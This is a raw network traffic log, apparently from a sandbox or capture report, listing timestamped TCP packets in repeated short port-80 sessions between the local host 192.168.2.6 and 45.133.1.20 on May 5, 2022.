May 5, 2022 08:46:11.786866903 CEST	49777	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:11.812761068 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.812916994 CEST	49777	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:11.838656902 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.871474981 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.871562958 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.871704102 CEST	49777	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:11.929109097 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.929279089 CEST	49777	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:12.282473087 CEST	49777	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:12.309139967 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:12.958784103 CEST	49778	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:12.985939026 CEST	80	49778	45.133.1.20	192.168.2.6
May 5, 2022 08:46:12.986049891 CEST	49778	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:12.988894939 CEST	49778	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:13.016204119 CEST	80	49778	45.133.1.20	192.168.2.6
May 5, 2022 08:46:13.016323090 CEST	49778	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:13.041870117 CEST	80	49778	45.133.1.20	192.168.2.6
May 5, 2022 08:46:13.084786892 CEST	80	49778	45.133.1.20	192.168.2.6
May 5, 2022 08:46:13.084810019 CEST	80	49778	45.133.1.20	192.168.2.6
May 5, 2022 08:46:13.084903002 CEST	49778	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:13.084984064 CEST	49778	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:13.111167908 CEST	80	49778	45.133.1.20	192.168.2.6
May 5, 2022 08:46:13.993448973 CEST	49779	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:14.019017935 CEST	80	49779	45.133.1.20	192.168.2.6
May 5, 2022 08:46:14.019249916 CEST	49779	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:14.046129942 CEST	49779	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:14.071762085 CEST	80	49779	45.133.1.20	192.168.2.6
May 5, 2022 08:46:14.071837902 CEST	49779	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:14.097388983 CEST	80	49779	45.133.1.20	192.168.2.6
May 5, 2022 08:46:14.137701988 CEST	80	49779	45.133.1.20	192.168.2.6
May 5, 2022 08:46:14.137794018 CEST	80	49779	45.133.1.20	192.168.2.6
May 5, 2022 08:46:14.137877941 CEST	49779	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:14.154405117 CEST	49779	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:14.180064917 CEST	80	49779	45.133.1.20	192.168.2.6
May 5, 2022 08:46:15.154742002 CEST	49780	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:15.181096077 CEST	80	49780	45.133.1.20	192.168.2.6
May 5, 2022 08:46:15.181377888 CEST	49780	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:15.184581995 CEST	49780	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:15.210243940 CEST	80	49780	45.133.1.20	192.168.2.6
May 5, 2022 08:46:15.210380077 CEST	49780	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:15.236038923 CEST	80	49780	45.133.1.20	192.168.2.6
May 5, 2022 08:46:15.265968084 CEST	80	49780	45.133.1.20	192.168.2.6
May 5, 2022 08:46:15.265996933 CEST	80	49780	45.133.1.20	192.168.2.6
May 5, 2022 08:46:15.266164064 CEST	49780	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:15.266190052 CEST	49780	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:15.291933060 CEST	80	49780	45.133.1.20	192.168.2.6
May 5, 2022 08:46:16.299664021 CEST	49781	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:16.325510025 CEST	80	49781	45.133.1.20	192.168.2.6
May 5, 2022 08:46:16.325709105 CEST	49781	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:16.336569071 CEST	49781	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:16.362577915 CEST	80	49781	45.133.1.20	192.168.2.6
May 5, 2022 08:46:16.362673044 CEST	49781	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:16.388345003 CEST	80	49781	45.133.1.20	192.168.2.6
May 5, 2022 08:46:16.421443939 CEST	80	49781	45.133.1.20	192.168.2.6
May 5, 2022 08:46:16.421494961 CEST	80	49781	45.133.1.20	192.168.2.6
May 5, 2022 08:46:16.421605110 CEST	49781	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:16.421643019 CEST	49781	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:16.447292089 CEST	80	49781	45.133.1.20	192.168.2.6
May 5, 2022 08:46:17.459208012 CEST	49782	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:17.485095978 CEST	80	49782	45.133.1.20	192.168.2.6
May 5, 2022 08:46:17.486258030 CEST	49782	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:17.488993883 CEST	49782	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:17.514698982 CEST	80	49782	45.133.1.20	192.168.2.6
May 5, 2022 08:46:17.517147064 CEST	49782	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:17.542860985 CEST	80	49782	45.133.1.20	192.168.2.6
May 5, 2022 08:46:17.568052053 CEST	80	49782	45.133.1.20	192.168.2.6
May 5, 2022 08:46:17.568103075 CEST	80	49782	45.133.1.20	192.168.2.6
May 5, 2022 08:46:17.568243980 CEST	49782	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:17.568293095 CEST	49782	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:17.594041109 CEST	80	49782	45.133.1.20	192.168.2.6
May 5, 2022 08:46:18.806593895 CEST	49783	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:18.832165003 CEST	80	49783	45.133.1.20	192.168.2.6
May 5, 2022 08:46:18.832312107 CEST	49783	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:18.841994047 CEST	49783	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:18.867532969 CEST	80	49783	45.133.1.20	192.168.2.6
May 5, 2022 08:46:18.867662907 CEST	49783	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:18.893286943 CEST	80	49783	45.133.1.20	192.168.2.6
May 5, 2022 08:46:18.919632912 CEST	80	49783	45.133.1.20	192.168.2.6
May 5, 2022 08:46:18.919702053 CEST	80	49783	45.133.1.20	192.168.2.6
May 5, 2022 08:46:18.919786930 CEST	49783	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:18.919840097 CEST	49783	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:18.945512056 CEST	80	49783	45.133.1.20	192.168.2.6
May 5, 2022 08:46:21.058904886 CEST	49786	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:21.084845066 CEST	80	49786	45.133.1.20	192.168.2.6
May 5, 2022 08:46:21.085432053 CEST	49786	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:21.088184118 CEST	49786	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:21.114031076 CEST	80	49786	45.133.1.20	192.168.2.6
May 5, 2022 08:46:21.115345001 CEST	49786	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:21.141000032 CEST	80	49786	45.133.1.20	192.168.2.6
May 5, 2022 08:46:21.180464983 CEST	80	49786	45.133.1.20	192.168.2.6
May 5, 2022 08:46:21.180620909 CEST	49786	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:21.180644989 CEST	80	49786	45.133.1.20	192.168.2.6
May 5, 2022 08:46:21.180708885 CEST	49786	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:21.206311941 CEST	80	49786	45.133.1.20	192.168.2.6
May 5, 2022 08:46:23.876312017 CEST	49789	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:23.901952982 CEST	80	49789	45.133.1.20	192.168.2.6
May 5, 2022 08:46:23.902123928 CEST	49789	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:23.904851913 CEST	49789	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:23.930859089 CEST	80	49789	45.133.1.20	192.168.2.6
May 5, 2022 08:46:23.930970907 CEST	49789	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:23.956674099 CEST	80	49789	45.133.1.20	192.168.2.6
May 5, 2022 08:46:23.986737013 CEST	80	49789	45.133.1.20	192.168.2.6
May 5, 2022 08:46:23.986769915 CEST	80	49789	45.133.1.20	192.168.2.6
May 5, 2022 08:46:23.986920118 CEST	49789	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:23.987452030 CEST	49789	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:24.013135910 CEST	80	49789	45.133.1.20	192.168.2.6
May 5, 2022 08:46:28.141515017 CEST	49790	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:28.167458057 CEST	80	49790	45.133.1.20	192.168.2.6
May 5, 2022 08:46:28.167593002 CEST	49790	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:28.170344114 CEST	49790	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:28.196062088 CEST	80	49790	45.133.1.20	192.168.2.6
May 5, 2022 08:46:28.196135044 CEST	49790	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:28.221890926 CEST	80	49790	45.133.1.20	192.168.2.6
May 5, 2022 08:46:28.254359961 CEST	80	49790	45.133.1.20	192.168.2.6
May 5, 2022 08:46:28.254400015 CEST	80	49790	45.133.1.20	192.168.2.6
May 5, 2022 08:46:28.254523039 CEST	49790	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:28.254838943 CEST	49790	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:28.280379057 CEST	80	49790	45.133.1.20	192.168.2.6
May 5, 2022 08:46:30.022569895 CEST	49791	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:30.048295975 CEST	80	49791	45.133.1.20	192.168.2.6
May 5, 2022 08:46:30.048413038 CEST	49791	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:30.051409006 CEST	49791	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:30.077058077 CEST	80	49791	45.133.1.20	192.168.2.6
May 5, 2022 08:46:30.077204943 CEST	49791	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:30.102874994 CEST	80	49791	45.133.1.20	192.168.2.6
May 5, 2022 08:46:30.135314941 CEST	80	49791	45.133.1.20	192.168.2.6
May 5, 2022 08:46:30.135445118 CEST	80	49791	45.133.1.20	192.168.2.6
May 5, 2022 08:46:30.135471106 CEST	49791	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:30.135519981 CEST	49791	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:30.161175013 CEST	80	49791	45.133.1.20	192.168.2.6
May 5, 2022 08:46:31.463718891 CEST	49793	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:31.489507914 CEST	80	49793	45.133.1.20	192.168.2.6
May 5, 2022 08:46:31.489623070 CEST	49793	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:31.492450953 CEST	49793	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:31.518460035 CEST	80	49793	45.133.1.20	192.168.2.6
May 5, 2022 08:46:31.518572092 CEST	49793	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:31.544800997 CEST	80	49793	45.133.1.20	192.168.2.6
May 5, 2022 08:46:31.569453955 CEST	80	49793	45.133.1.20	192.168.2.6
May 5, 2022 08:46:31.569581032 CEST	49793	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:31.569807053 CEST	80	49793	45.133.1.20	192.168.2.6
May 5, 2022 08:46:31.569891930 CEST	49793	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:31.595300913 CEST	80	49793	45.133.1.20	192.168.2.6
May 5, 2022 08:46:32.739850044 CEST	49795	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:32.765528917 CEST	80	49795	45.133.1.20	192.168.2.6
May 5, 2022 08:46:32.765749931 CEST	49795	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:32.770695925 CEST	49795	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:32.796336889 CEST	80	49795	45.133.1.20	192.168.2.6
May 5, 2022 08:46:32.796432972 CEST	49795	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:32.822113037 CEST	80	49795	45.133.1.20	192.168.2.6
May 5, 2022 08:46:32.845130920 CEST	80	49795	45.133.1.20	192.168.2.6
May 5, 2022 08:46:32.845175982 CEST	80	49795	45.133.1.20	192.168.2.6
May 5, 2022 08:46:32.845258951 CEST	49795	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:32.845330954 CEST	49795	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:32.870966911 CEST	80	49795	45.133.1.20	192.168.2.6
May 5, 2022 08:46:33.947304964 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:36.956399918 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:36.982203007 CEST	80	49796	45.133.1.20	192.168.2.6
May 5, 2022 08:46:36.982301950 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:36.985054970 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:37.010833979 CEST	80	49796	45.133.1.20	192.168.2.6
May 5, 2022 08:46:37.010900021 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:37.036783934 CEST	80	49796	45.133.1.20	192.168.2.6
May 5, 2022 08:46:37.077541113 CEST	80	49796	45.133.1.20	192.168.2.6
May 5, 2022 08:46:37.077655077 CEST	80	49796	45.133.1.20	192.168.2.6
May 5, 2022 08:46:37.077662945 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:37.077723026 CEST	49796	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:37.103598118 CEST	80	49796	45.133.1.20	192.168.2.6
May 5, 2022 08:46:39.623234987 CEST	49801	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:39.649231911 CEST	80	49801	45.133.1.20	192.168.2.6
May 5, 2022 08:46:39.649482965 CEST	49801	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:39.663667917 CEST	49801	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:39.689495087 CEST	80	49801	45.133.1.20	192.168.2.6
May 5, 2022 08:46:39.689560890 CEST	49801	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:39.715259075 CEST	80	49801	45.133.1.20	192.168.2.6
May 5, 2022 08:46:39.747967958 CEST	80	49801	45.133.1.20	192.168.2.6
May 5, 2022 08:46:39.748009920 CEST	80	49801	45.133.1.20	192.168.2.6
May 5, 2022 08:46:39.748137951 CEST	49801	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:39.748214960 CEST	49801	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:39.773919106 CEST	80	49801	45.133.1.20	192.168.2.6
May 5, 2022 08:46:41.791201115 CEST	49803	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:41.816798925 CEST	80	49803	45.133.1.20	192.168.2.6
May 5, 2022 08:46:41.816925049 CEST	49803	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:41.821501017 CEST	49803	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:41.847227097 CEST	80	49803	45.133.1.20	192.168.2.6
May 5, 2022 08:46:41.847678900 CEST	49803	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:41.873394966 CEST	80	49803	45.133.1.20	192.168.2.6
May 5, 2022 08:46:41.905873060 CEST	80	49803	45.133.1.20	192.168.2.6
May 5, 2022 08:46:41.905889988 CEST	80	49803	45.133.1.20	192.168.2.6
May 5, 2022 08:46:41.905958891 CEST	49803	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:41.906069040 CEST	49803	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:41.931476116 CEST	80	49803	45.133.1.20	192.168.2.6
May 5, 2022 08:46:47.065920115 CEST	49806	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:47.092921019 CEST	80	49806	45.133.1.20	192.168.2.6
May 5, 2022 08:46:47.093015909 CEST	49806	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:47.095755100 CEST	49806	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:47.121457100 CEST	80	49806	45.133.1.20	192.168.2.6
May 5, 2022 08:46:47.121552944 CEST	49806	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:47.147526979 CEST	80	49806	45.133.1.20	192.168.2.6
May 5, 2022 08:46:47.184792995 CEST	80	49806	45.133.1.20	192.168.2.6
May 5, 2022 08:46:47.184845924 CEST	80	49806	45.133.1.20	192.168.2.6
May 5, 2022 08:46:47.184914112 CEST	49806	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:47.184950113 CEST	49806	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:47.210741043 CEST	80	49806	45.133.1.20	192.168.2.6
May 5, 2022 08:46:49.101778030 CEST	49807	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:49.127429962 CEST	80	49807	45.133.1.20	192.168.2.6
May 5, 2022 08:46:49.127535105 CEST	49807	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:49.130492926 CEST	49807	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:49.156208992 CEST	80	49807	45.133.1.20	192.168.2.6
May 5, 2022 08:46:49.156307936 CEST	49807	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:49.182001114 CEST	80	49807	45.133.1.20	192.168.2.6
May 5, 2022 08:46:49.213563919 CEST	80	49807	45.133.1.20	192.168.2.6
May 5, 2022 08:46:49.213733912 CEST	49807	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:49.213809967 CEST	80	49807	45.133.1.20	192.168.2.6
May 5, 2022 08:46:49.213891983 CEST	49807	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:49.239551067 CEST	80	49807	45.133.1.20	192.168.2.6
May 5, 2022 08:46:50.462841034 CEST	49813	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:50.489159107 CEST	80	49813	45.133.1.20	192.168.2.6
May 5, 2022 08:46:50.489265919 CEST	49813	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:50.492080927 CEST	49813	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:50.519220114 CEST	80	49813	45.133.1.20	192.168.2.6
May 5, 2022 08:46:50.520315886 CEST	49813	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:50.546113968 CEST	80	49813	45.133.1.20	192.168.2.6
May 5, 2022 08:46:50.568424940 CEST	80	49813	45.133.1.20	192.168.2.6
May 5, 2022 08:46:50.568454981 CEST	80	49813	45.133.1.20	192.168.2.6
May 5, 2022 08:46:50.568531990 CEST	49813	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:50.568578005 CEST	49813	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:50.595846891 CEST	80	49813	45.133.1.20	192.168.2.6
May 5, 2022 08:46:51.528772116 CEST	49814	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:51.555057049 CEST	80	49814	45.133.1.20	192.168.2.6
May 5, 2022 08:46:51.555176973 CEST	49814	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:51.558074951 CEST	49814	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:51.584573030 CEST	80	49814	45.133.1.20	192.168.2.6
May 5, 2022 08:46:51.584703922 CEST	49814	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:51.611004114 CEST	80	49814	45.133.1.20	192.168.2.6
May 5, 2022 08:46:51.641252041 CEST	80	49814	45.133.1.20	192.168.2.6
May 5, 2022 08:46:51.641309977 CEST	80	49814	45.133.1.20	192.168.2.6
May 5, 2022 08:46:51.641387939 CEST	49814	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:51.641417980 CEST	49814	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:51.667057991 CEST	80	49814	45.133.1.20	192.168.2.6
May 5, 2022 08:46:55.945395947 CEST	49816	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:55.971554995 CEST	80	49816	45.133.1.20	192.168.2.6
May 5, 2022 08:46:55.971698046 CEST	49816	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:55.974919081 CEST	49816	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:56.001095057 CEST	80	49816	45.133.1.20	192.168.2.6
May 5, 2022 08:46:56.001226902 CEST	49816	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:56.026881933 CEST	80	49816	45.133.1.20	192.168.2.6
May 5, 2022 08:46:56.063024998 CEST	80	49816	45.133.1.20	192.168.2.6
May 5, 2022 08:46:56.063097000 CEST	80	49816	45.133.1.20	192.168.2.6
May 5, 2022 08:46:56.063160896 CEST	49816	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:56.063203096 CEST	49816	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:56.088968992 CEST	80	49816	45.133.1.20	192.168.2.6
May 5, 2022 08:46:57.721995115 CEST	49818	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:57.748529911 CEST	80	49818	45.133.1.20	192.168.2.6
May 5, 2022 08:46:57.748684883 CEST	49818	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:57.751458883 CEST	49818	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:57.777210951 CEST	80	49818	45.133.1.20	192.168.2.6
May 5, 2022 08:46:57.777304888 CEST	49818	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:57.805988073 CEST	80	49818	45.133.1.20	192.168.2.6
May 5, 2022 08:46:57.840574026 CEST	80	49818	45.133.1.20	192.168.2.6
May 5, 2022 08:46:57.840643883 CEST	80	49818	45.133.1.20	192.168.2.6
May 5, 2022 08:46:57.840724945 CEST	49818	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:57.840867996 CEST	49818	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:57.866405010 CEST	80	49818	45.133.1.20	192.168.2.6
May 5, 2022 08:46:59.099565029 CEST	49819	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:59.125133991 CEST	80	49819	45.133.1.20	192.168.2.6
May 5, 2022 08:46:59.125224113 CEST	49819	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:59.128279924 CEST	49819	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:59.154026985 CEST	80	49819	45.133.1.20	192.168.2.6
May 5, 2022 08:46:59.154638052 CEST	49819	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:59.180283070 CEST	80	49819	45.133.1.20	192.168.2.6
May 5, 2022 08:46:59.219291925 CEST	80	49819	45.133.1.20	192.168.2.6
May 5, 2022 08:46:59.219329119 CEST	80	49819	45.133.1.20	192.168.2.6
May 5, 2022 08:46:59.219444036 CEST	49819	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:59.220263004 CEST	49819	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:59.245780945 CEST	80	49819	45.133.1.20	192.168.2.6
May 5, 2022 08:47:00.506937981 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:00.533533096 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:00.533703089 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:00.537714005 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:00.563373089 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:00.563507080 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:00.589421034 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:00.622258902 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:00.622402906 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:00.707943916 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:00.708005905 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:01.030510902 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:01.030616045 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:01.030651093 CEST	49820	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:01.056718111 CEST	80	49820	45.133.1.20	192.168.2.6
May 5, 2022 08:47:03.690577030 CEST	49824	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:03.716223955 CEST	80	49824	45.133.1.20	192.168.2.6
May 5, 2022 08:47:03.716317892 CEST	49824	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:03.719001055 CEST	49824	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:03.744621992 CEST	80	49824	45.133.1.20	192.168.2.6
May 5, 2022 08:47:03.744713068 CEST	49824	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:03.770380020 CEST	80	49824	45.133.1.20	192.168.2.6
May 5, 2022 08:47:03.798513889 CEST	80	49824	45.133.1.20	192.168.2.6
May 5, 2022 08:47:03.798556089 CEST	80	49824	45.133.1.20	192.168.2.6
May 5, 2022 08:47:03.798639059 CEST	49824	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:03.798681021 CEST	49824	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:03.824698925 CEST	80	49824	45.133.1.20	192.168.2.6
May 5, 2022 08:47:06.383930922 CEST	49828	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:06.409638882 CEST	80	49828	45.133.1.20	192.168.2.6
May 5, 2022 08:47:06.409728050 CEST	49828	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:06.412861109 CEST	49828	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:06.438354015 CEST	80	49828	45.133.1.20	192.168.2.6
May 5, 2022 08:47:06.438435078 CEST	49828	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:06.463984966 CEST	80	49828	45.133.1.20	192.168.2.6
May 5, 2022 08:47:06.487222910 CEST	80	49828	45.133.1.20	192.168.2.6
May 5, 2022 08:47:06.487252951 CEST	80	49828	45.133.1.20	192.168.2.6
May 5, 2022 08:47:06.487350941 CEST	49828	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:06.487386942 CEST	49828	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:06.512834072 CEST	80	49828	45.133.1.20	192.168.2.6
May 5, 2022 08:47:08.211415052 CEST	49833	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:08.239159107 CEST	80	49833	45.133.1.20	192.168.2.6
May 5, 2022 08:47:08.239296913 CEST	49833	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:08.250713110 CEST	49833	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:08.276141882 CEST	80	49833	45.133.1.20	192.168.2.6
May 5, 2022 08:47:08.276225090 CEST	49833	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:08.301733971 CEST	80	49833	45.133.1.20	192.168.2.6
May 5, 2022 08:47:08.327680111 CEST	80	49833	45.133.1.20	192.168.2.6
May 5, 2022 08:47:08.327831984 CEST	49833	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:08.327848911 CEST	80	49833	45.133.1.20	192.168.2.6
May 5, 2022 08:47:08.327903986 CEST	49833	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:08.353351116 CEST	80	49833	45.133.1.20	192.168.2.6
May 5, 2022 08:47:09.307068110 CEST	49839	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:09.332969904 CEST	80	49839	45.133.1.20	192.168.2.6
May 5, 2022 08:47:09.333163977 CEST	49839	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:09.336080074 CEST	49839	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:09.362087965 CEST	80	49839	45.133.1.20	192.168.2.6
May 5, 2022 08:47:09.363354921 CEST	49839	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:09.389084101 CEST	80	49839	45.133.1.20	192.168.2.6
May 5, 2022 08:47:09.413443089 CEST	80	49839	45.133.1.20	192.168.2.6
May 5, 2022 08:47:09.413481951 CEST	80	49839	45.133.1.20	192.168.2.6
May 5, 2022 08:47:09.413567066 CEST	49839	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:09.415482998 CEST	49839	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:09.441237926 CEST	80	49839	45.133.1.20	192.168.2.6
May 5, 2022 08:47:10.400228024 CEST	49847	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:10.426275015 CEST	80	49847	45.133.1.20	192.168.2.6
May 5, 2022 08:47:10.426410913 CEST	49847	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:10.430170059 CEST	49847	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:10.455945969 CEST	80	49847	45.133.1.20	192.168.2.6
May 5, 2022 08:47:10.456146002 CEST	49847	80	192.168.2.6	45.133.1.20
May 5, 2022 08:47:10.481869936 CEST	80	49847	45.133.1.20	192.168.2.6
May 5, 2022 08:47:10.510929108 CEST	80	49847	45.133.1.20	192.168.2.6
May 5, 2022 08:47:10.510958910 CEST	80	49847	45.133.1.20	192.168.2.6
